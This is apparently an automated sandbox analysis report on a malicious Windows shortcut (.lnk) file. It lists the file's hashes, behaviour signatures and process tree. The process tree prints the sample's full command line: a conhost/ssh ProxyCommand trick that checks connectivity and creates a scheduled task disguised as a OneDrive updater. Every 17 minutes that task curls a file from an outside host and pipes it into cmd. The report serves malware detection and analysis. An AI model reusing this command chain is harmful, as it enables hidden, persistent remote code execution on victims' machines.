Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
19-09-2024 01:06
General
-
Target
18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
-
Size
245KB
-
MD5
0290bfd06ee52af334e6cd17bb03542a
-
SHA1
fb43ac19f177acb3cc7cd74155671733185339b6
-
SHA256
18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6
-
SHA512
e0647f45fbf606fbf0d7dd5737c2c4d6794e7ed6322f05b1803b3f9011fcc33c29519e44715b13da96bc49fed564d79c2f5fe54b56d4f4779ebeb6fdccf6ccd1
-
SSDEEP
6144:XBRWbjpVO9Ko6pGKlt9Z6v+iEpgnXtP2gUly2ukiT:XiPho60Kt9ZylBnXteDlXs
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\system32\conhost.exe"C:\WINDOWS\system32\conhost.exe" --headless ssh -o ProxyCommand="cmd /c ping www.google.com > nul & timeout /t 3 & schtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr \"conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=XPAJOTIY_Admin & more C:\Users\Public\documents\tmp.jpg | cmd\" " .2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-